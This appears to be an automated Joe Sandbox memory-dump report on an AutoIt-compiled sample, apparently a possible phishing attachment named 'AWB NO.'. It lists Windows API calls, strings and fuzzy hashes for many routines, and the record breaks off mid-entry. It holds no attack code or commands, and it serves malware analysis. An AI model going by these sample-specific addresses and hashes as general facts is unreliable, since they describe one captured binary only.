                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
                                                              • String ID:
                                                              • API String ID: 2762341140-0
                                                              APIs
                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00457135
                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 0045718E
                                                              • VariantInit.OLEAUT32(?), ref: 004571A0
                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 004571C0
                                                              • VariantCopy.OLEAUT32(?,?), ref: 00457213
                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 00457227
                                                              • VariantClear.OLEAUT32(?), ref: 0045723C
                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 00457249
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00457252
                                                              • VariantClear.OLEAUT32(?), ref: 00457264
                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0045726F
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                              • String ID:
                                                              • API String ID: 2706829360-0
                                                              APIs
                                                                • Part of subcall function 00420B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00406C6C,?,00008000), ref: 00420BB7
                                                                • Part of subcall function 004048AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004048A1,?,?,004037C0,?), ref: 004048CE
                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00406D0D
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00406E5A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              Similarity
                                                              • API ID: CurrentDirectory$FullNamePath
                                                              • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                              • API String ID: 1801377286-1018226102
                                                              APIs
                                                              • CoInitialize.OLE32 ref: 00478718
                                                              • CoUninitialize.OLE32 ref: 00478723
                                                              • CoCreateInstance.OLE32(?,00000000,00000017,00492BEC,?), ref: 00478783
                                                              • IIDFromString.OLE32(?,?), ref: 004787F6
                                                              • VariantInit.OLEAUT32(?), ref: 00478890
                                                              • VariantClear.OLEAUT32(?), ref: 004788F1
                                                              Strings
                                                              Similarity
                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                              • API String ID: 636576611-1287834457
                                                              APIs
                                                              • CharLowerBuffW.USER32(?,?,0048F910), ref: 0046AB76
                                                              • GetDriveTypeW.KERNEL32(00000061,004BA620,00000061), ref: 0046AC40
                                                              Strings
                                                              Similarity
                                                              • API ID: BuffCharDriveLowerType
                                                              • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                              • API String ID: 2426244813-1000479233
                                                              APIs
                                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 004646E8
                                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 0046470E
                                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00464784
                                                              Strings
                                                              Similarity
                                                              • API ID: FileInfoVersion$QuerySizeValue
                                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                              • API String ID: 2179348866-1459072770
                                                              APIs
                                                              • WSAStartup.WSOCK32(00000101,?), ref: 00475AA6
                                                              • inet_addr.WSOCK32(?,?,?), ref: 00475AEB
                                                              • gethostbyname.WSOCK32(?), ref: 00475AF7
                                                              • IcmpCreateFile.IPHLPAPI ref: 00475B05
                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00475B75
                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00475B8B
                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00475C00
                                                              • WSACleanup.WSOCK32 ref: 00475C06
                                                              Strings
                                                              Similarity
                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                              • String ID: Ping
                                                              • API String ID: 1028309954-2246546115
                                                              APIs
                                                              • LoadStringW.USER32(00000066,?,00000FFF,0048FB78), ref: 0046A0FC
                                                              • LoadStringW.USER32(?,?,00000FFF,?), ref: 0046A11E
                                                              Strings
                                                              Similarity
                                                              • API ID: LoadString
                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR$%I
                                                              • API String ID: 2948472770-1791166345
                                                              APIs
                                                              • CreateMenu.USER32 ref: 004873F4
                                                              • SetMenu.USER32(?,00000000), ref: 00487403
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487490
                                                              • IsMenu.USER32(?), ref: 004874A6
                                                              • CreatePopupMenu.USER32 ref: 004874B0
                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004874DD
                                                              • DrawMenuBar.USER32 ref: 004874E5
                                                              Strings
                                                              Similarity
                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                              • String ID: 0$F
                                                              • API String ID: 161812096-3044882817
                                                              APIs
                                                              • SetErrorMode.KERNEL32(00000001), ref: 0046B73B
                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0046B7B1
                                                              • GetLastError.KERNEL32 ref: 0046B7BB
                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 0046B828
                                                              Strings
                                                              Similarity
                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                              • API String ID: 4194297153-14809454
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 004594F6
                                                              • GetDlgCtrlID.USER32 ref: 00459501
                                                              • GetParent.USER32 ref: 0045951D
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459520
                                                              • GetDlgCtrlID.USER32(?), ref: 00459529
                                                              • GetParent.USER32(?), ref: 00459545
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459548
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 2573188126-1403004172
                                                              APIs
                                                                • Part of subcall function 0045B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 0045B0E7
                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 004595DF
                                                              • GetDlgCtrlID.USER32 ref: 004595EA
                                                              • GetParent.USER32 ref: 00459606
                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00459609
                                                              • GetDlgCtrlID.USER32(?), ref: 00459612
                                                              • GetParent.USER32(?), ref: 0045962E
                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 00459631
                                                              Strings
                                                              Similarity
                                                              • API ID: MessageSend$CtrlParent$ClassName
                                                              • String ID: ComboBox$ListBox
                                                              • API String ID: 2573188126-1403004172
                                                              APIs
                                                              • GetMenuItemInfoW.USER32(004C6890,000000FF,00000000,00000030), ref: 00462A92
                                                              • SetMenuItemInfoW.USER32(004C6890,00000004,00000000,00000030), ref: 00462AC8
                                                              • Sleep.KERNEL32(000001F4), ref: 00462ADA
                                                              • GetMenuItemCount.USER32(?), ref: 00462B1E
                                                              • GetMenuItemID.USER32(?,00000000), ref: 00462B3A
                                                              • GetMenuItemID.USER32(?,-00000001), ref: 00462B64
                                                              • GetMenuItemID.USER32(?,?), ref: 00462BA9
                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00462BEF
                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462C03
                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00462C24
                                                              Similarity
                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                              • String ID:
                                                              • API String ID: 1460738036-0
                                                              • Opcode ID: 638b7d30cc1c27bdbe2d4b3278922b6b7190dbed23476bfa5db6d6130c3c592a
                                                              • Instruction ID: 18a65889ef34665f5b2b5336e4e6eed4a99801a903535dc72d9624464193ca63
                                                              • Opcode Fuzzy Hash: 638b7d30cc1c27bdbe2d4b3278922b6b7190dbed23476bfa5db6d6130c3c592a
                                                              • Instruction Fuzzy Hash: 6461D4B0900649BFDB21CF54CE88DBF7BB8EB41704F14446EE841A7251E7B9AD05DB2A
                                                              APIs
                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00487214
                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00487217
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0048723B
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0048725E
                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 004872D6
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$LongWindow
                                                              • String ID:
                                                              • API String ID: 312131281-0
                                                              • Opcode ID: 7c0549792cb58a85db63f83a94352240f63381d44f9194f46865063892b0a211
                                                              • Instruction ID: 92033519db1ee425eec29857b32d50f63e453e63508eb3b516053c7f4a854d7f
                                                              • Opcode Fuzzy Hash: 7c0549792cb58a85db63f83a94352240f63381d44f9194f46865063892b0a211
                                                              • Instruction Fuzzy Hash: 83618D75900208AFDB10EFA4CC81EEE77F8EF09704F24456AFA14A73A1D774A945DB68
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00461700
                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00460778,?,00000001), ref: 00461714
                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0046171B
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460778,?,00000001), ref: 0046172A
                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0046173C
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460778,?,00000001), ref: 00461755
                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00460778,?,00000001), ref: 00461767
                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00460778,?,00000001), ref: 004617AC
                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460778,?,00000001), ref: 004617C1
                                                              • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00460778,?,00000001), ref: 004617CC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                              • String ID:
                                                              • API String ID: 2156557900-0
                                                              • Opcode ID: f51c8bfa66544c569d19aaa402eb205ee2878779a81b5281422b9c9027375036
                                                              • Instruction ID: 25e0562e4a853ce0dffc12f93c3d42453493f01f65cd87b86ec24f904145336b
                                                              • Opcode Fuzzy Hash: f51c8bfa66544c569d19aaa402eb205ee2878779a81b5281422b9c9027375036
                                                              • Instruction Fuzzy Hash: 4431B1B5600208BFEB119F15DC84F6A37A9EB15712F14403AF900D63B0EB789D448F5A
                                                              APIs
                                                              • EnumChildWindows.USER32(?,0045AA64), ref: 0045A9A2
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ChildEnumWindows
                                                              • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                              • API String ID: 3555792229-1603158881
                                                              • Opcode ID: 5002a5fddf50bcde79a6dc7ed207d4ecd5304ff53ed89cbdedaef835e7354da4
                                                              • Instruction ID: fef9e380a92afd939488e92735a90e3e03dac4f82d76b1b1da84a970d37b0683
                                                              • Opcode Fuzzy Hash: 5002a5fddf50bcde79a6dc7ed207d4ecd5304ff53ed89cbdedaef835e7354da4
                                                              • Instruction Fuzzy Hash: 0491A870A005169BDB08DF61C441BEAF774BF04305F50861BDD99A7243DF38696ECBA9
                                                              APIs
                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0046DCBA
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046DCCE
                                                              • GetFileAttributesW.KERNEL32(?), ref: 0046DCE6
                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 0046DD00
                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 0046DD12
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: CurrentDirectory$AttributesFile
                                                              • String ID: *.*
                                                              • API String ID: 769691225-438819550
                                                              • Opcode ID: 4ff4b3304e30e7372bce4acf512d47791e3657f32d4172ef8cbbad650c9c1621
                                                              • Instruction ID: f9490e5959290cb0956c410083a53966904df6dcd6624628cec000a7d302a53e
                                                              • Opcode Fuzzy Hash: 4ff4b3304e30e7372bce4acf512d47791e3657f32d4172ef8cbbad650c9c1621
                                                              • Instruction Fuzzy Hash: A781A171F042449FCB24EF24C84596BB7E8AB88704F19882FF885CB251F639E945CB5B
                                                              APIs
                                                              • SetWindowLongW.USER32(?,000000EB), ref: 00402EAE
                                                                • Part of subcall function 00401DB3: GetClientRect.USER32(?,?), ref: 00401DDC
                                                                • Part of subcall function 00401DB3: GetWindowRect.USER32(?,?), ref: 00401E1D
                                                                • Part of subcall function 00401DB3: ScreenToClient.USER32(?,?), ref: 00401E45
                                                              • GetDC.USER32 ref: 0043CF82
                                                              • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0043CF95
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0043CFA3
                                                              • SelectObject.GDI32(00000000,00000000), ref: 0043CFB8
                                                              • ReleaseDC.USER32(?,00000000), ref: 0043CFC0
                                                              • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0043D04B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                              • String ID: U
                                                              • API String ID: 4009187628-3372436214
                                                              • Opcode ID: ac078e28f3ea691151e5ef7866497dcbf17aee0d19fba673f73f7b4a748de671
                                                              • Instruction ID: 2191f090442df1d8b75e7b8316c733f380aeebf8947418e196bed5f94657404b
                                                              • Opcode Fuzzy Hash: ac078e28f3ea691151e5ef7866497dcbf17aee0d19fba673f73f7b4a748de671
                                                              • Instruction Fuzzy Hash: 9371E030900204DFCF259F64C884AAB3BB6FF48318F14427BED556A2E6C7398842DB69
                                                              APIs
                                                              • GetParent.USER32 ref: 00459651
                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00459666
                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 004596F3
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: ClassMessageNameParentSend
                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                              • API String ID: 1290815626-3381328864
                                                              • Opcode ID: 8da25be9963f5362c8281a606c59e80aff7d3ba0eb6a1818d155a44e7ff51480
                                                              • Instruction ID: bc076bbec5daa4fa657486baf201fb4d95d262ba898abc0a63e9505c33c1a26c
                                                              • Opcode Fuzzy Hash: 8da25be9963f5362c8281a606c59e80aff7d3ba0eb6a1818d155a44e7ff51480
                                                              • Instruction Fuzzy Hash: AB110D77284317FAF6112A21EC06DE7779C8B05366F30012BFE00A51D2FE5D5D19565C
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0048F910), ref: 0047903D
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0048F910), ref: 00479071
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 004791EB
                                                              • SysFreeString.OLEAUT32(?), ref: 00479215
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: b04b0867597dee5a9e4bc7ed899de829a492c47d6f4e073cd839085c3a2da284
                                                              • Instruction ID: d823893b77008293a877efc66923c6ca52dd90e804d3cf8965e8a59a88dd0146
                                                              • Opcode Fuzzy Hash: b04b0867597dee5a9e4bc7ed899de829a492c47d6f4e073cd839085c3a2da284
                                                              • Instruction Fuzzy Hash: 88F13B71A00109EFDB14DFA4C888EEEB7B9FF49314F10845AF919AB291CB35AD46CB54
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0048896E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: f9955f9f76259972ec6e275ab8be0955b166ab190053183b70d7920e0264596f
                                                              • Instruction ID: ce3ba57332302dd11e88512b1cb2c7dfa5fb76f3510afc4bef344cccc543630f
                                                              • Opcode Fuzzy Hash: f9955f9f76259972ec6e275ab8be0955b166ab190053183b70d7920e0264596f
                                                              • Instruction Fuzzy Hash: A551B530500208BFEF24BF25CC89B6E7B65BB04314FA0492FF515E62E1DF79A9809B59
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0043C547
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0043C569
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0043C581
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0043C59F
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0043C5C0
                                                              • DestroyIcon.USER32(00000000), ref: 0043C5CF
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0043C5EC
                                                              • DestroyIcon.USER32(?), ref: 0043C5FB
                                                                • Part of subcall function 0048A71E: DeleteObject.GDI32(00000000), ref: 0048A757
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                              • String ID:
                                                              • API String ID: 2819616528-0
                                                              • Opcode ID: 61ada204b0baa075d0d90a1bef732fe5bc3f929f5ee94e243fbc7940e1d17bda
                                                              • Instruction ID: ec079f4291a2db88e8ca5db72d3a048905e4d4933e17b5c0ba9f28e8cd77e0c5
                                                              • Opcode Fuzzy Hash: 61ada204b0baa075d0d90a1bef732fe5bc3f929f5ee94e243fbc7940e1d17bda
                                                              • Instruction Fuzzy Hash: 90515C74600205AFDB24DF25CD89FAA37B5EB58710F10452EF902A72D0DBB8ED91DB68
                                                              APIs
                                                                • Part of subcall function 0045AE57: GetWindowThreadProcessId.USER32(?,00000000), ref: 0045AE77
                                                                • Part of subcall function 0045AE57: GetCurrentThreadId.KERNEL32 ref: 0045AE7E
                                                                • Part of subcall function 0045AE57: AttachThreadInput.USER32(00000000,?,00459B65,?,00000001), ref: 0045AE85
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00459B70
                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00459B8D
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00459B90
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00459B99
                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00459BB7
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00459BBA
                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00459BC3
                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00459BDA
                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00459BDD
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.18135219047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000000.00000002.18135183835.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135352248.00000000004B5000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135452069.00000000004BF000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.18135493686.00000000004C8000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_400000_AWB NO.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                              • String ID:
                                                              • API String ID: 2014098862-0
                                                              • Opcode ID: 186f5a4a339b244dea2483338f7b71a3368c4d65e5ecd7b2cf0cf16f5cfcc7d8
                                                              • Instruction ID: 1060ee3db04237a4cc3f6e3244fd23507871b35e4bea80529f675733977b5495
                                                              • Opcode Fuzzy Hash: 186f5a4a339b244dea2483338f7b71a3368c4d65e5ecd7b2cf0cf16f5cfcc7d8
                                                              • Instruction Fuzzy Hash: EA112571550608BEF6102B20DC8EF6E3B1CEB0C755F100829F604AB0A1CAF26C10DBA8
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00458A84,00000B00,?,?), ref: 00458E0C
                                                              • HeapAlloc.KERNEL32(00000000,?,00458A84,00000B00,?,?), ref: 00458E13
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00458A84,00000B00,?,?), ref: 00458E28
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00458A84,00000B00,?,?), ref: 00458E30
                                                              • DuplicateHandle.KERNEL32(00000000,?,00458A84,00000B00,?,?), ref: 00458E33
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00458A84,00000B00,?,?), ref: 00458E43
                                                              • GetCurrentProcess.KERNEL32(00458A84,00000000,?,00458A84,00000B00,?,?), ref: 00458E4B
                                                              • DuplicateHandle.KERNEL32(00000000,?,00458A84,00000B00,?,?), ref: 00458E4E
                                                              • CreateThread.KERNEL32(00000000,00000000,00458E74,00000000,00000000,00000000), ref: 00458E68
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: f61be43bb8a549cd9dad831aeb1a4a8effc801e856b1440697cddf08235fc6c0
